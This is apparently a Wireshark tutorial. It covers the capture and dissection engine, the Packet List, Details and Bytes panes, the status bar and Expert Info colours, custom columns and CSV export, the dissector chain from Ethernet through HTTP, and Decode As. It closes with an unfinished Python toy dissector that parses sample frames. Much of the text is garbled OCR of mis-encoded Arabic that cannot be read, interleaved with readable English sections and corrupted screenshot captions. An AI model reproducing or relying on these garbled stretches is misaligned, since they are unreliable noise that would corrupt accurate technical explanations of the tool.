til ja^ll jj .tiSjUi j^tjJI SjS jSj^ 11a j .^LujVI ^ j^ll Jj ^ J^V^ [capture engine] JalisJVi ^1 

^jjalujj cjI jUaj Jj ciljUi jjI jll Jj 3_^^la3l djjlJI CjI^j Jc J-<isu jll jdissectors cl>^ ^c^j tiljUi jjI jll ^Jujy\ 

.6^ Jc^ JSa. J^=^ ^J^ J jSa. b±G Jj jUaVl ^Jjoij (Jjja jc J^su dissectors J .U^V^ C?' ^IjS ^^klouJl 

c^LJI J^ ^^ILVI jSajj 4-^>J! cilj^ j&j [Ethereal Packet Analyzer] c> :[Epan] J^ l^j^j 

:<> uj^j www.wireshark.org J ^j^ll [Epan]^V^ J ^ L g J ±^A\ 

.CjV j£ jj jjjII JalijlVI CjULJ cjUUjII Jaia. Jc^ Jasu [protocol-tree]S j^iJI JjSjjjjj ■ 

www.wireshark.org J ^j^ll epan/dissectors ^V^' J ^ t> [Dissectors] ■ 

.plugin ^ UjaUbj ^jj dissectors c> [Dissector-Plugins] ■ 

www.wireshark.org J ±j±yAS epan/dfilter J >^ & [Display-filter] ■ 

U jL^alklj tiljLi jjI jll jl kiA jjujjII CjIj^VI GIMP j^j^ .^^1^11 <^lj ja jj* Jll A^a j-uijJI CjI jJ^I 
<J jj^^JI j£-djj,^li£ j CjIjI j^JI j tial jjll 2^^) cl)J^ Aaajai^illj 4_j^LkJI £-1 j^yi/cJ^-^V^ ^J^7> J^Uil] ^^klo^ j GTK + 2 

.www.gtk.org 6jLij <JjjL jo l^Sj^ CjUjkJI ^> Jo 

^ LibPcap J capture file JaliilVI cjUL ^1 jll wiretap ^l^ki^l ^ : [wiretap] ^^1^11 J^ c^aUl t 

<Jalfljl| ^j* ^ | jjuj djlii^ll j>» 1 flla ^J3 Ak- _5Ja ji^Jl traCC file ^f^^ djlil^l ^Ij^yi/Jl^^VI < la j J ^ajl - Iklujj j LLLoj 

CjliLJI l— iljjjudjj j-<i jjj^II j .core engine cs-^^J^ cilj^JI Jj < aUl li^ ^jLouj ^jL j^.1 Jalijll ^Ujjj jl tiljUi jjI jll <iajoj| jj 

^ [FRAME] jUaVlj [PACKET] ^>JI c« d^ 1 J* u * 

(J^Luj ^ilaj^a^ "4^<ij^." ^ilaj^axi ^Vlmj IjJJ^ J .(J J^ JJ J^>^^ (J-aI^J ^llc ( J ^^JjoiaII Cjl ^n^ll jxa jj^aJJai ^i^ll jJ.JA jl (_£jJjoi 

jj^A jjJ ^cj^alj lilljA jSlj 6A£jJall JJC <Luj jj ^aJJ ^1 t L^ajl 

Ji.) ^ aIjLII ^Ij MAC MAC jj ^Ull JU^jVI Jj Sj^V 1 ^ e^" 1 ^ g^^^ 1 :(Frame) j^V 1 
Jc^ Jaia c^ji^j ja j "Ethernet II." ^g^^l t J^l jlajuoll I^jj .cjI jUaVI ^ ^'i >> n Sj^VI jjj djVl^ajVI .(^j^j o 3 ' j 

. jUaVI ClAjjl^ ^ jC <jlxa diUi jlx-d Jc ^5jl^J V J -la^a AjaUiaj diUi jls^ 

i^ii jaJl (jli t TCP/IP^VU^I ^ . MAC jU^I ^ uj^ ^1 *L^Vl ^ *->JI : [Packets]^>J) 

.MAC 6& lj^Zj [IP header] 

.CjUUj Ji HTTP Header lUAj o ! o^j c^'j TCP Header ^ l^a *>JI ^ : [segment] f>J) 
[Screenshot: Wireshark Packet Details pane for an HTTP GET frame:]

Frame 8: 539 bytes on wire (4312 bits), 539 bytes captured (4312 bits)
  Interface id: 0
  WTAP_ENCAP: 1
  Arrival Time: Nov 7, 2012 10:08:08.163611000 Pacific Standard Time
  [Time shift for this packet: 0.000000000 seconds]
  Epoch Time: 1352311688.163611000 seconds
  [Time delta from previous captured frame: 0.001194000 seconds]
  [Time delta from previous displayed frame: 0.001194000 seconds]
  [Time since reference or first frame: 0.123047000 seconds]
  Frame Number: 8
  Frame Length: 539 bytes (4312 bits)
  Capture Length: 539 bytes (4312 bits)
  [Frame is marked: False]
  [Frame is ignored: False]
  [Protocols in frame: eth:ip:tcp:http]
  [Coloring Rule Name: http]
  [Coloring Rule String: http || tcp.port == 80]
Ethernet II, Src: Hewlett-_a7:bf:a3 (d4:85:64:a7:bf:a3), Dst: Cadant_...
Internet Protocol Version 4, Src: 24.6.173.220 (24.6.173.220), Dst: 2...
Transmission Control Protocol, Src Port: 6413 (6413), Dst Port: http ...
Hypertext Transfer Protocol
  GET / HTTP/1.1\r\n
  Host: www.cheezburger.com\r\n
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/2010...
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=...
  Accept-Language: en-US,en;q=0.5\r\n
  Accept-Encoding: gzip, deflate\r\n
  Connection: keep-alive\r\n
  Referer: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&q...
  \r\n
  [Full request URI: http://www.cheezburger.com/]



[Annotation: The Frame section contains metadata applied by Wireshark; the layers are labelled Frame, Packet and Segment]



Use the Wireshark Wiki Protocol Pages 

AilS Ai j*^3 http://wiki.wireshark.org jll s jtj jj JjSjjjjj djUi^a aLA^ J^U ^> ^ ^3 jUi jjI jll ^ 

>( Jj£jj jjJl jC dlLa jlxxll ^aJ.^3 URL Cfl LP.-- ^ Jj^J^ ^jujI AiLjal L^ajj <n .liljLuo jjI jib Aalxlall CjLg jIslxJI 

.( http://wiki.wireshark.org/Ethernet ) <^VI < 



[Screenshot: Wireshark packet list with HTTP continuation packets from 74.125.224.80 to 24.6.173.220 and the context menu open on the selected Data section of the Packet Details pane; the menu includes Prepare a Filter, Colorize with Filter, Follow UDP Stream and Wiki Protocol Page]

ask.wireshark.org &* ^^Vl ^ J>^aaJI ^ 



^jJa ^ La£) tiljUi jj! jll ^d^klauJ JIjjuj (jc ojUc ^^ILd ^Uljlj Lais ttiljUi jjI jll ^L^a c j£ ^31 

J^^l 4^ .^J^ j^'jil 4 4-^»UJl illuiVl ^ http://ask.wireshark.org -M jll *O^J c>



^^£3 liljUjj jjI jll AjjoijjjII Sialil! ^^ic Ajujjoj djJoj iaaa ^H^j m ^ j^j Lq jj^3^ ^^>^ ^ q j c-H 3 ^*3^ ^W^^ t-Ajta ^H^j V 
^k A^CL*1\ c fljl la jll (j-d ^jAsJI tilU& ^ji ^ ^c. jll C5 lc .aJUII 4-aJj^a q^jxj tiljUi jj! j3I ^jli ;tiljLJj jj! j3I cJaxJI IHj LaAic.
File Open j (jj* .S^-^j^ CjIj^VI JajjJjj ^.iuujjII 4_Ajli3! j& tiljLi jjI jll ^k Jiiill aIloij ^jjujI ^jla ^Slj a 



[Screenshot: Wireshark start page with the Interface List, Open, Sample Captures, How to Capture and Network Media links, annotated: "Don't rely on this Start Page to move around in Wireshark. You won't see it when you are capturing traffic or working in saved trace files. Click the Open File button to begin analyzing a trace file."]




<jjonjjll J ja* j-<Jl jj^UxJl c allai a c Qui^lun j (trace file) c ala ^ (J.at.Lh .^^joujjJI jA\ A ^ La (j uj 

t£l iLS all 



File       -> open file sets, save subsets of packets, export HTTP objects
Edit       -> clear all marked packets, ignored packets, and time references
View       -> view/hide toolbars and panes, edit the Time column setting, reset coloring
Analyze    -> create display filter macros, see enabled protocols, save forced decodes
Statistics -> build graphs and open statistics windows for various protocols
Telephony  -> perform all telephony-related functions (graphs, charts, playback)
Tools      -> build firewall rules from packet contents, access the Lua scripting tool
Internals  -> view the dissector tables and a list of supported protocols
Help       -> learn where Wireshark stores global and personal configuration files

^cl jS I J jj^a jll L-LzJxja j djliLal! ^iil ^^joUJjJ! dil -laJjJj ^^ic 6^ ja» jljjVl (J* A-j^ S^lflSj J-<iJtJl <l3 







[Screenshot: Wireshark main toolbar icons, grouped: Interface List, Capture Options, Start Capture, Stop Capture, Restart Capture | Open File, Save File, Close File, Reload File, Print | Go Back, Go Forward, Go to Number, Go to First, Go to Last | Coloring, Auto-Scroll | Zoom In, Zoom Out, Zoom 100%, Resize Columns | Capture Filters, Display Filters, Coloring Rules, Preferences, Help]
jJaiil Cy* t-iVVI dAi* j\ c uj-^ ".u^ ^ l>* *^J" ( ♦ 1 ^ >>1 ^ (Display Filter) o^j*^\ ^.vyimi

C5 ic^ .^^jj ^1 ^jLuj cs-^' jjj*^' ^jjj (Display Filter) o^j*^\ J^U. ^ .l^a 



(Display Filter) o^j*^\ A'&a\ <Lg (j^a^J dujliVI 4£f*5 C5 ic ^q>^l a^A*. *lk^l t M t *y > nb ^ j£i c±£ lij & JUaII 



[Screenshot: Wireshark display filter toolbar, annotated: Access saved display filters; Display filter area - supports auto-complete and error detection; Drop-down (last used); Clear the display; Create Filter Expression button; Filter Expression button area; Expressions to help build filters; Apply filter to traffic]



< (Packet Details pane)?j*^ J^^ii <> (Packet List pane) i> uj£" V-^J^ ^j^ 1 jjIjM u' ^ 

.(Packet Bytes) 











[Screenshot: Wireshark main window split into the Packet List Pane (DNS queries from 24.6.173.220 to 75.75.75.75 and their responses, then a TCP three-way handshake and an HTTP GET between 24.6.173.220 and 74.125.224.80), the Packet Details Pane (Frame 1: 74 bytes on wire (592 bits); Ethernet II; Internet Protocol Version 4; User Datagram Protocol, Src Port: 51724; Domain Name System (query)) and the Packet Bytes Pane with the hex dump of the selected frame]



(Packet List pane) fj^l ^ - 

a^{c CjL<» jls^j i 4 o laajudAll cjikiflaiill jl cjV jjj^>JI c^jL^lJI ^jjqj - ^oll (Packet List pane) ^-aj^ ^3^^ l)^^ 

.(jLaJl CJlUH J jaxJI ."NO.") J^V^ L^^^ ^ J**^\ L-Laia. Jjill ^JJ tUk^ljJfll .<SjUuJ| 

(Packet List pane) f JaJ) Ljjj^ ^21) A^ljjflV) Sx^Sfl ^ Ui 

Number ("No.") column 

jllaxJl J J-^^ (J I Jfi^\ (S^^- dr^ ^ ^ ( ^3^^ 

Time column 

.Time column ci^j^ 3 Jj^ 3 ^^ c>j J^Ul^ 

Source and Destination columns - 

MAC u^j^ lSj^ W ^ j^V^ . J-M (Address Layer) d\y*l\ <^jllj j ^^ l s^^l 

.^-^ j^^ j j^oxll saacI 1VIAC cl^j^ c ' lP 3 ^^ ^ * >1 c> *u^ } (cJ^^^ cJ^f^ 'ARP r^3^) 

Protocol column 
cjtLfLajl! U» aAjsu* JjI^j d±£ lij <ja jlaill lac ^jl£^ ligi . jUaVl ^^ic l^lnlaj ^2 dissector j^f lP 3 ^*^ ^J^ 1






Length column 
Info column 



[Screenshot: Wireshark Packet List pane:]

No. Time      Source         Destination    Protocol Length Info
1   0.000000  24.6.173.220   75.75.75.75    DNS      74     Standard query 0xae0b ...
2   0.013237  75.75.75.75    24.6.173.220   DNS      154    Standard query response ...
3   0.000784  24.6.173.220   75.75.75.75    DNS      74     Standard query 0x455...
4   0.013724  75.75.75.75    24.6.173.220   DNS      102    Standard query response ...
5   0.001004  24.6.173.220   74.125.224.80  TCP      66     35145 > http [SYN] Seq=0 ...
6   0.017372  74.125.224.80  24.6.173.220   TCP      66     http > 35145 [SYN, ACK] ...
7   0.000187  24.6.173.220   74.125.224.80  TCP      54     35145 > http [ACK] Seq=1 ...
8   0.000740  24.6.173.220   74.125.224.80  HTTP     342    GET / HTTP/1.1
9   0.013703  74.125.224.80  24.6.173.220   TCP      60     http > 35145 [ACK] ...
10  0.054773  74.125.224.80  24.6.173.220   TCP      1484   [TCP segment of a reassembled PDU]
11  0.002200  74.125.224.80  24.6.173.220   TCP      1484   [TCP segment of a reassembled PDU]



/oAaC-VI L_fli^. j iQ^ajC* t^likl till ^JJJ (Jjj jLall (j-^Vl J_)^ ^A^cVI (j-a (J^J (Jj3 



[Screenshots: the same Wireshark packet list with the column-header context menu open (No Sorting, Align Left, Align Right (default), Column Preferences..., Edit Column Details...), and with the packet context menu open (Set Time Reference (toggle), Time Shift..., Edit or Add Packet Comment..., Apply as Filter, Prepare a Filter, Conversation Filter, Colorize Conversation, SCTP, Follow TCP Stream, Follow UDP Stream, Follow SSL Stream, Copy, Print...)]
^ET / HTTP/1. 1 
ttp > 35145 [ACK] Seq=] 
TTP/l r l 200 OK tte*t/J 



red C592 bits> on inter 
3} + 
173. 
Port: 



, Dst: Cadant_31:bb:- 
3. 220^^ Dst: 75.75. 7 ■ 
rt: domain (5 3> 



T .\l..,. d e . 

KK 

KK.n,5, ( VES, , . , 

w ww. googl 

e. cow 
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(Packet Details pane) J^at& * - 

jj! jll .4£jj^3I J^Lk Jilij ^jII 4_*jaJI U dbaJ (Frame section) J-^V' jti tlij] j£i U£ .(.k^ jV! * jaJI) ^ j^JI 

.jLL^I J>j 4jU.yi fij 4jU»yi 

.(Expand Subtrees) ^Sk j^Jj ^ J\ (Expand All) lUSIU <*j^jj! jUaVI 

(Packet bytes pane) <0^l * - 
Packet Bytes ^ i>j View <f>^ * lsj^ Au 3 V ^ .ASCII jl hex ^ j^V ^ 

a u ji Ai^y t*Ui j 



[Figure: frame 1 of the trace in the three panes. Packet Details: Frame 1: 74 bytes on wire (592 bits), 74 bytes captured (592 bits); Ethernet II, Src: Hewlett-_a7:bf:a3 (d4:85:64:a7:bf:a3), Dst: Cadant_31:bb:c1; Internet Protocol Version 4, Src: 24.6.173.220, Dst: 75.75.75.75; User Datagram Protocol, Src Port: 51724, Dst Port: domain (53); Domain Name System (query) with [Response In: 2], Transaction ID: 0xae0b, Flags: 0x0100 Standard query, Questions: 1, Answer RRs: 0, Authority RRs: 0, Additional RRs: 0, and the query www.google.com: type A, class IN. The Packet Bytes pane shows the frame's hex dump with the selected field highlighted.]
The Status Bar

The Status Bar at the bottom of the Wireshark window is divided into three columns: on the left, the Expert Info button and the trace file annotation button followed by information about the selected field, the capture or the trace file; in the middle, packet counts and load time; on the right, the profile currently in use.

[Figure: the Status Bar: Expert Info button, trace file annotation button, field/capture/trace file information, packet count and load time information, and the current profile in use.]

The Expert Info button

Wireshark's expert system flags packets that show potential problems (retransmissions, zero window conditions, malformed packets and so on). The colour of the Expert Info button tells you the most severe kind of item found in the trace, so you can see at a glance whether the trace is worth a closer look before opening Analyze | Expert Info:

Red: the highest level is Errors
Yellow: the highest level is Warnings
Cyan: the highest level is Notes
Blue: the highest level is Chats
Green: the trace contains packet comments, but no Errors, Warnings or Notes
Grey: there are no Expert Info items

The trace file annotation button

The trace file annotation button, next to the Expert Info button, opens a dialog for adding a comment that describes the trace file as a whole (what was captured, where and why). Trace file comments are saved only in pcap-ng format, not in the older pcap format.
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First Column: Get Field, Capture, or Trace File Information 

CjLg jlstxi ^ jli .<Ja jjc- (Jj^j CjULJI j AjfT^JI .LLaj^l/^jjjll diliL hq^j tiljUi jjI jll <jla ^ j^JI laLajll 

li& J^-laJ .ciljUjj jj! jll 4_Ljail ^aJ £f^l L_flL* ^joj! jl ojLoi^j ^JJ ^3 (^^1 dlS^Jl £JJj3l L_aL» ^jujI j* laJ -lalijlVI dAiLa 

t c aLall 11a J-ac jl ^lia Sa^ j t aLall ^-^1 ^ 

Second Column: Get Packet Counts (Total and Displayed) - 

<jJajjx-<Jl ^aj^Jl Ac p\ > nj^ ^I^JjujI AjCj lis jQ^ a JJ*-!l jl -la ji^all s-l jjoj £JJjJl L_flL* J C5^^) ^ J**^^ ^ li^A? 

. Dropped^^ J SjjliJI ^ >JI j Displayed 
Third Column: Determine the Current Profile 

' HTTP JJJ* ^J** (Jjlskjj ^ j£j d£ lij 6 JtlxJl ^if^ ^s^- .S^A^g CIjVI^ Jc- liljUj jj! jll (j^aJj^kjl ^JJXJ djUL e-Lij] ^lVs aJ 

j&j* J .^Lkll Lkk [HTTP 5XX] jl J^l [HTTP 4XX] 5^ ojjfcll j — y g^l cJuj*j]| L_aL ^t;<^ 

JaJjjai (j-G (j-aJ^I .J ^*-!l J Jajuijll £jJa jll (jlajC ^aJJ , HTTP C ^-<^ ^ Ailj^alj ^a^l 

j^j L_flJjsu c flLa Aj,Jj*j3 I^jAjcI c ^j3I L_flJjxj3l CjliLa I^JS <Lajta cill J^-laJ ^ > /Ml J ^axJI jLall J*jjjV1 jj^-J j£jl .(j^AjuJ! 



djLi j.) jil VIEWj SETTING 
(Add Columns to the Packet List Pane) ?>^t * J! SaapI 

<c jjaij til^cLojj (jl (j^-GJ oA^cVI AiUial (jla ttilli ^ j .AjjojLojVI djUi jlx-<J! ja jj* ^^ill SaacVI AjjJaljjal <c ^ tiljUjj jj! j3I ^jj^j 

I 4iLjaV (j^J^ ^ (> ^Sll 

.(J^jojI <Lj]a ^I^JjojIj oA^cVI 5-Ujdjl (j£-oJ V (jU^-VI (J^a*^ 

Right-Click I Apply as Column (the "easy way") 

Jjj^lij* £ j^. ^ dijjjjVI <J j^>^ l$\ (^z* Cy*S^\ jj^-t jfi^ 1 .^l j^VI ^ 6.jjI jll ^jill j J j^-^ ^3^^ lS^j^^ o^^s 
.<l^aJI AijjiJl ^ £>i&j .Apply as Column ^^jj J^JI l>^^^ l>-jIaJI jjl^ j^j J^- AiUiaV 

[Figure: the field menu of the Packet Details pane (Expand All, Apply as Column, Apply as Filter, Prepare a Filter, Colorize with Filter, Follow TCP Stream, Follow UDP Stream, Follow SSL Stream, Copy, Wiki Protocol Page, Filter Field Reference, Protocol Help, Protocol Preferences, Decode As, Go to Corresponding Packet), opened on the Time to live field of the IPv4 header of a DNS query to 75.75.75.75, with Apply as Column selected.]
Edit | Preferences | Columns (the "hard way")

Columns can also be added through the preferences. Choose Edit | Preferences, select Columns in the left-hand list, and click Add. Set the Field type of the new column to Custom and type the display-filter name of the field, for example ip.ttl, in the Field name box; the column title can be edited to something shorter. The Field occurrence box selects which instance of the field to show when a field occurs more than once in a packet (0 shows every occurrence). Columns can be dragged up and down the list to change their order in the Packet List pane.
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Uhi Interface 
Layout 

F(Hlt 

Colon 
Printing 

Hunt ft#ra&niori 
>:*: H 



FJh*finrt kri erfiy be dapiiyed +t Hii 
Clayed Trile F*Wtyp* 

V Time Tu-ne ffo^mit «. sp«rfierfj 



E3 Tinwtcivc CatfoaHtpJtf] 



V Dertj^rttor* Dedjn<t>wi arrets 

V Pnototci ftoto«>l 

' Info Worrnalren 



leftiiofl colucr**! ■ Ct*5 and drop? *rfn<s "o chjrvgc tGSji"i ^cter] 




Fitfd wcun-ence 0 



Hide, Remove, Rearrange, Realign, and Edit Columns

A column you do not need for the current task does not have to be deleted. Right-click the column heading in the Packet List pane and uncheck it under Displayed Columns to hide it; it stays in the profile and can be shown again from the same menu or from Edit | Preferences | Columns. The same menu lets you Remove Column, set the alignment (Align Left, Align Center, Align Right), sort on the column, or change its title and field with Edit Column Details. To rearrange columns, drag a column heading to its new position.



[Figure: the column heading menu in the Packet List pane (Sort Ascending, Sort Descending, No Sorting, Align Left, Align Center, Align Right, Column Preferences, Edit Column Details, Displayed Columns, Hide Column, Remove Column), opened over a trace containing HTTP GET requests and DNS queries.]
Export Column Data

The contents of the columns can be exported together with the packet list. For example, after adding a Time to Live column, choose File | Export Packet Dissections | as "CSV" (Comma Separated Values packet summary) file. The displayed columns are written to a CSV file that can be opened in a spreadsheet to chart or analyse the values further.

Dissect the Wireshark Dissectors

Frames reach Wireshark either from the Capture Engine (a live capture) or from the Wiretap Library (a saved trace file) and are handed to the Core Engine. The Core Engine passes each frame along a chain of dissectors, one per protocol. Each dissector decodes its own header, uses a field in that header to decide which protocol comes next, and hands the rest of the frame to that protocol's dissector. The result of this chain is what you see in the Packet Details pane. If no dissector can be found for the remaining bytes, they are shown as undissected data.

Take an HTTP GET request as an example. The frame dissector, the Ethernet dissector, the IPv4 dissector, the TCP dissector and finally the HTTP dissector each decode their own part of the frame, as the following sections show.

Frame Dissector

The Frame dissector decodes the information that the trace file records about each frame rather than bytes that travelled on the wire: the arrival time and the timestamp deltas derived from it, the frame number, the frame and capture lengths, the list of protocols found in the frame, and the coloring rule that matched it. Fields in square brackets are generated by Wireshark, not carried in the packet.

Frame 8: 345 bytes on wire (2760 bits), 345 bytes captured (2760 bits)
    Interface id: 0
    WTAP_ENCAP: 1
    Arrival Time: Oct 24, 2012 15:05:09.699888000 Pacific Daylight Time
    [Time shift for this packet: 0.000000000 seconds]
    Epoch Time: 1351116309.699888000 seconds
    [Time delta from previous captured frame: 0.000847000 seconds]
    [Time delta from previous displayed frame: 0.000847000 seconds]
    [Time since reference or first frame: 0.140475000 seconds]
    Frame Number: 8
    Frame Length: 345 bytes (2760 bits)
    Capture Length: 345 bytes (2760 bits)
    [Frame is marked: False]
    [Frame is ignored: False]
    [Protocols in frame: eth:ip:tcp:http]
    [Coloring Rule Name: HTTP]
    [Coloring Rule String: http || tcp.port == 80]

The Ethernet Dissector Takes Over

The Ethernet dissector decodes the Ethernet II header: the destination and source MAC addresses and the Type field. The Type field tells it which dissector comes next; a value of 0x0800 means IPv4, so the rest of the frame is handed to the IPv4 dissector (0x0806 would mean ARP, 0x86dd IPv6).

Ethernet II, Src: Hewlett-_a7:bf:a3 (d4:85:64:a7:bf:a3), Dst: Cadant_31:bb:c1 (00:01:5c:31:bb:c1)
    Destination: Cadant_31:bb:c1 (00:01:5c:31:bb:c1)
    Source: Hewlett-_a7:bf:a3 (d4:85:64:a7:bf:a3)
    Type: IP (0x0800)

The IPv4 Dissector Takes Over

The IPv4 dissector decodes the IPv4 header and reads the Protocol field. A value of 6 means TCP, so the remainder of the packet is handed to the TCP dissector (17 would mean UDP, 1 ICMP).

Internet Protocol Version 4, Src: 24.6.173.220 (24.6.173.220), Dst: 198.66.239.146 (198.66.239.146)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
    Total Length: 331
    Identification: 0x20be (8382)
    Flags: 0x02 (Don't Fragment)
    Fragment offset: 0
    Protocol: TCP (6)
    Header checksum: [validation disabled]
    Source: 24.6.173.220 (24.6.173.220)
    Destination: 198.66.239.146 (198.66.239.146)

The HTTP Dissector Takes Over

The TCP dissector decodes the TCP header and uses the port numbers to choose the next dissector: port 80 is registered to the HTTP dissector, so the TCP payload is handed to it. The HTTP dissector then decodes the request line and the headers that follow it. Note that nothing in the packet says "this is HTTP"; the hand-off is based on the port number, which is why traffic on an unexpected port is not recognised unless you tell Wireshark how to decode it (see below).

Hypertext Transfer Protocol
    GET / HTTP/1.1\r\n
    Host: www.chappellu.com\r\n
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en
    Accept: text/html,application/xhtml+xml,application/xml;
    Accept-Language: en-us,en;q=0.5\r\n
    Accept-Encoding: gzip,deflate\r\n
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n
    Keep-Alive: 115\r\n
    Connection: keep-alive\r\n
    \r\n
    [Full request URI: http://www.chappellu.com/]
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^jL dii^ .137 j iiiftll FTP ^ ^ ^ -Lr^ dissector jj! j]| ? j±] (J^ki 

.NetBIOS jjj* ^j^h ^ ^ ^ij^ jjjJi 

"netbios-ns" ^ Protocol TCP <^j* ?jk ^J 1 ^ V NetBIOS jjj* 

aj^UJI Jjj^aliiill C5 lc ^ jl^J V Info ^ djUjla^ ^jl ^aia a aL&li li^ djUjla^ ^ Jiiill .Info ^ j**^ <^ ^-^1 Aikia ^ 

.NetBIOS a— Vl 



£<*«. v.*w» £o £spiuf* &n4ty» Slrtdfrc* T**tp4w^ I©c«s |r**«ni* a* 

fit *( ft *C & G3 K 0 a %^>^^7^ (HQlS (ilQ^E Vt W *? ^ H 

Time Saurct D«tinaticn Pre'ctnl Length lnfc^ 

7 , 104 TCP 

0.00004)0 207.137,7.104 207.137.7.103 TCP 

0.027000 207.1 J7. 7. 103 207.137.7.104 TCP 

0.0 J 3000 207,137,7.104 207.137.7.103 TCP 

0.03&000 207, 137. 7. 103 207.137.7.104 TCP 

0,040000 207.137.7.104 207.137.7.103 TCP 




There are two reasons Wireshark may fail to apply the right dissector: (1) the traffic uses a port for which that dissector is not registered, for example HTTP on port 48600, or (2) Wireshark has no dissector at all for the protocol. In the first case you can tell Wireshark which dissector to use, in either of two ways.

Analyze | Decode As

Right-click a packet of the conversation (or use Analyze | Decode As), open the Transport tab, select the port (TCP port 48600 in this example) and choose the dissector to apply (HTTP). From then on Wireshark decodes that port exactly as it decodes port 80. This is the right tool when an application uses a non-standard port on one network only, because the setting applies to the current session rather than to the dissector's configuration.

Heuristic dissectors

Some dissectors do not rely on port numbers: a heuristic dissector inspects the payload for a pattern it recognises (an HTTP request line, for example) and claims the packet if the pattern matches. Wireshark consults heuristic dissectors when no port-based dissector has claimed the payload. They can be enabled or disabled in the preferences of the protocol concerned.

Protocol preferences: port lists

Many dissectors keep the list of ports they respond to in their preferences, so a port can be added permanently. If a web server listens on port 81, for example, choose Edit | Preferences, expand Protocols, select HTTP and add 81 to the TCP Ports list. Some dissectors allow you to add or change the port setting this way; others only respond to Decode As.

[Figure: the HTTP protocol preferences: Reassemble HTTP headers spanning multiple TCP segments, Reassemble HTTP bodies spanning multiple TCP segments, Reassemble chunked transfer-coded bodies, Uncompress entity bodies, and the TCP Ports list beginning 80, 3128, 3132, 5985, 8080, 8088, 11371, 1900, 2869, with the note "Some applications allow you to add or change the port setting".]
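To make the hand-offs of the last few sections concrete, here is an added example of a toy dissector chain in Python. It is my own illustration, not Wireshark code and not part of the original text: the Ethernet Type field selects IPv4, the IPv4 Protocol field selects TCP or UDP, and the transport ports select the application dissector from a port table, with a Decode As override table checked first and a heuristic HTTP check used when no port matches. The two frames it parses are constructed inline from the values in the figures above (the DNS query for www.google.com and the GET for www.chappellu.com); the function names, the PORT_TABLE and DECODE_AS tables and the odd-port frame on TCP 48600 are assumptions made for the example.

```python
import struct

ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP, IPPROTO_UDP = 6, 17
HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"HTTP/")

# Port registrations, as a dissector's "TCP/UDP Ports" preference would hold them.
PORT_TABLE = {("udp", 53): "dns", ("tcp", 80): "http"}
# Analyze | Decode As overrides; filled by decode_as() and consulted before PORT_TABLE.
DECODE_AS = {}


def decode_as(transport, port, name):
    """Equivalent of Analyze | Decode As: force a dissector for one transport port."""
    DECODE_AS[(transport, port)] = name


def dissect_dns(payload, out):
    """Application dissector: DNS header and the first question, like the Info column."""
    tid, flags, _qdcount = struct.unpack("!HHH", payload[:6])
    pos, labels = 12, []                       # question section follows the 12-byte header
    while payload[pos]:                        # labels end with a zero-length label
        n = payload[pos]
        labels.append(payload[pos + 1:pos + 1 + n].decode("ascii"))
        pos += 1 + n
    qtype = struct.unpack("!H", payload[pos + 1:pos + 3])[0]
    kind = "response" if flags & 0x8000 else "query"
    out["info"] = f"Standard {kind} 0x{tid:04x} {'A' if qtype == 1 else qtype} {'.'.join(labels)}"


def dissect_http(payload, out):
    """Application dissector: the request/status line is the Info column text."""
    out["info"] = payload.split(b"\r\n", 1)[0].decode("ascii", "replace")


APP_DISSECTORS = {"dns": dissect_dns, "http": dissect_http}


def heuristic_tcp(payload):
    """Content-based guess, tried only when no port-based dissector matched."""
    return "http" if payload.startswith(HTTP_METHODS) else None


def dissect_frame(raw, heuristics=True):
    """Run the chain eth -> ip -> tcp/udp -> app over one raw frame; return a summary row."""
    out = {"length": len(raw), "protocols": ["eth"], "info": ""}
    ethertype = struct.unpack("!H", raw[12:14])[0]          # Ethernet II Type field
    if ethertype != ETHERTYPE_IPV4:
        out["info"] = f"Ethertype 0x{ethertype:04x}: no dissector in this example"
        return out
    out["protocols"].append("ip")
    ihl = (raw[14] & 0x0F) * 4                              # IPv4 header length in bytes
    proto = raw[14 + 9]                                     # IPv4 Protocol field
    out["src"] = ".".join(map(str, raw[26:30]))
    out["dst"] = ".".join(map(str, raw[30:34]))
    l4 = raw[14 + ihl:]
    if proto == IPPROTO_TCP:
        transport, payload = "tcp", l4[(l4[12] >> 4) * 4:]  # skip header per data offset
    elif proto == IPPROTO_UDP:
        transport, payload = "udp", l4[8:]
    else:
        out["info"] = f"IP protocol {proto}: no dissector in this example"
        return out
    sport, dport = struct.unpack("!HH", l4[:4])
    out["protocols"].append(transport)
    out["sport"], out["dport"] = sport, dport
    name = None
    for port in (dport, sport):                             # Decode As wins over the port table
        name = DECODE_AS.get((transport, port)) or PORT_TABLE.get((transport, port))
        if name:
            break
    if name is None and heuristics and transport == "tcp":
        name = heuristic_tcp(payload)
    if name in APP_DISSECTORS:
        out["protocols"].append(name)
        APP_DISSECTORS[name](payload, out)
    else:                                                   # nothing claimed it: plain data
        out["protocols"].append("data")
        out["info"] = f"{sport} > {dport} Len={len(payload)}"
    return out


# --- constructed sample frames (not from a real capture) --------------------------------
def build_frame(src_ip, dst_ip, proto, l4_bytes):
    eth = bytes.fromhex("00015c31bbc1") + bytes.fromhex("d48564a7bfa3") + struct.pack("!H", ETHERTYPE_IPV4)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(l4_bytes), 0x20BE, 0x4000, 64, proto, 0,
                     bytes(map(int, src_ip.split("."))), bytes(map(int, dst_ip.split("."))))
    return eth + ip + l4_bytes


def udp(sport, dport, payload):
    return struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload


def tcp(sport, dport, payload):              # 20-byte header: data offset 5, flags PSH|ACK
    return struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 0x50, 0x18, 65535, 0, 0) + payload


def dns_query(name, tid=0xAE0B):
    qname = b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"
    return struct.pack("!HHHHHH", tid, 0x0100, 1, 0, 0, 0) + qname + struct.pack("!HH", 1, 1)


DNS_FRAME = build_frame("24.6.173.220", "75.75.75.75", IPPROTO_UDP, udp(51724, 53, dns_query("www.google.com")))
HTTP_REQ = b"GET / HTTP/1.1\r\nHost: www.chappellu.com\r\n\r\n"
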